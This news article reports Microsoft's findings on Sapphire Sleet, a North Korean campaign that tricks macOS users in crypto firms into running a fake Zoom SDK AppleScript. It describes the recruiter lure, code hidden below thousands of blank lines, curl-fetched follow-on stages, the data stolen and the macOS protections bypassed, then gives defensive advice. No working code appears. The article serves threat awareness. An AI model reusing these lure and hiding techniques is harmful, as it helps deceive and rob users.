A North Korean state-backed social engineering campaign targeting MacOS users has been uncovered by Microsoft's Threat Intelligence unit (MSTIC). The campaign, attributed to a threat actor tracked as Sapphire Sleet, employs a sophisticated multi-stage attack that tricks victims into manually executing malicious code by impersonating a software update for the Zoom videoconferencing platform. The operation has resulted in the theft of cryptocurrency assets, credentials, and sensitive personal data from individuals and organisations in the financial sector, particularly those involved in blockchain and digital assets.
According to MSTIC's report, the campaign demonstrates a shift in tactics for Sapphire Sleet, moving away from exploiting software vulnerabilities toward a user-initiated execution model. This approach allows the attackers to bypass several of MacOS's built-in security mechanisms, including Transparency, Consent and Control (TCC), Gatekeeper, quarantine enforcement, and notarisation checks. By having victims willingly run the malicious script, Sapphire Sleet achieves a highly reliable infection chain with lower operational friction, increasing the likelihood of successful compromise.
The attack chain in detail
The social engineering campaign begins with Sapphire Sleet operatives creating fake recruitment profiles on professional networking and social media platforms. These profiles are used to engage potential targets in conversations about job opportunities, particularly in the cryptocurrency and blockchain sectors. Selected victims are then invited to a technical interview, during which they are directed to download and execute a malicious file described as a software developer kit (SDK) update for Zoom.
The file, named Zoom SDK Update.scpt, is a compiled AppleScript that, by default, opens in MacOS's Script Editor—a trusted Apple application capable of executing arbitrary shell commands. To further lull victims into a false sense of security, the script includes large blocks of decoy upgrade instructions that mimic a routine software update. Crucially, beneath this text, thousands of blank lines are inserted to push the malicious portion of the script beyond the immediately scrollable view. This crude but effective technique ensures that victims see only the benign upgrade instructions when they first open the file.
Once the victim scrolls down and executes the script, it first launches a trusted Apple-signed process to reinforce the appearance of a genuine update. The script then retrieves additional malicious content from attacker-controlled servers using the curl command and passes it back to be executed. This secondary content, also in AppleScript form, loads in Script Editor again to initiate delivery of the final payload—a full attack orchestrator capable of system reconnaissance, data exfiltration, and further operations.
The data stolen during these attacks includes Apple Notes content, cryptocurrency wallet data, browser-stored credentials, keychain information, and Telegram session data. MSTIC confirmed that Sapphire Sleet has successfully exfiltrated such information from multiple victims before the campaign was disrupted.
A persistent threat to financial services
Sapphire Sleet has been active since at least March 2020 and is believed to have links to the more notorious Lazarus Group, another North Korean state-sponsored hacking collective. The group's primary motivation is financial gain—specifically, looting victims' cryptocurrency wallets to generate revenue for the isolated and cash-strapped regime in Pyongyang. Additionally, they target intellectual property and technical secrets related to cryptocurrency trading platforms and blockchain technology.
The financial services sector remains a prime target for North Korean cyber operations. Venture capital firms, blockchain startups, and cryptocurrency exchanges are particularly attractive due to their high-value digital assets and often less mature security practices. Sapphire Sleet has demonstrated a persistent focus on this sector, refining its social engineering techniques over time to increase effectiveness.
Unlike some state-sponsored groups that rely on zero-day exploits or complex supply chain attacks, Sapphire Sleet's strategy relies heavily on human psychology. By masquerading as recruiters and job opportunities, they exploit trust and the desire for career advancement. This method is especially effective in the cryptocurrency industry, where remote work and technical interviews involving software installations are common.
MacOS security bypass
The campaign is notable for its ability to evade MacOS's layered security defenses. Apple's operating system includes several protective mechanisms: Gatekeeper ensures that only trusted software runs; notarisation checks verify that applications have been scanned by Apple for malicious content; quarantine enforcement tracks the origin of downloaded files; and TCC manages access to sensitive system resources.
However, because the victim voluntarily runs the AppleScript in Script Editor—a trusted application—these protections are circumvented. The script itself does not trigger Gatekeeper because it is interpreted by a trusted tool. Similarly, since the victim initiates the execution, quarantining and notarisation checks are bypassed. This highlights a fundamental limitation of security models that rely on detecting malicious code rather than preventing user-initiated actions.
MSTIC also noted that the attackers used sophisticated techniques to hide the malicious code within the script, including inserting thousands of blank lines to push it out of view. This simple obfuscation works because many users do not carefully review the entire content of a script before executing it, especially when presented with convincing decoy text.
Mitigation and response
Apple has already implemented platform-level protections to detect and block Sapphire Sleet's infrastructure and malware. Safari browsing protections have been deployed, and new malware signatures have been issued to automatically update MacOS devices. However, as the attack vector relies on user behavior, technical controls alone are insufficient.
MSTIC recommends that organisations conduct user education about threats emanating from social media and external platforms, particularly any outreach that requires downloading software or executing terminal commands. Security teams should consider blocking or restricting the execution of compiled AppleScript files and unsigned Mach-O binaries downloaded from the internet. Any such files should be rigorously inspected and verified. It may also be wise to limit or audit the use of curl, especially when piped to interpreters.
Defenders should monitor for unauthorised modifications to the MacOS TCC database—a technique observed in this campaign—and audit LaunchDaemon and LaunchAgent installations. Users are advised to be cautious when copying and pasting sensitive data such as cryptocurrency wallet addresses or credentials, and to verify that pasted content matches the intended source. Rotating browser-stored credentials and protecting crypto wallets with hardware security measures are also recommended.
The broader risk extends beyond Sapphire Sleet. Social engineering campaigns targeting MacOS users are likely to increase as the platform's market share grows among high-value targets. The combination of convincing user prompts, trusted system tools, and manual execution creates a potent attack vector that is difficult to defend against purely with technical controls. Organisations must adopt a defense-in-depth approach that includes user awareness, strict software execution policies, and proactive monitoring for unusual system changes.
Source: ComputerWeekly.com News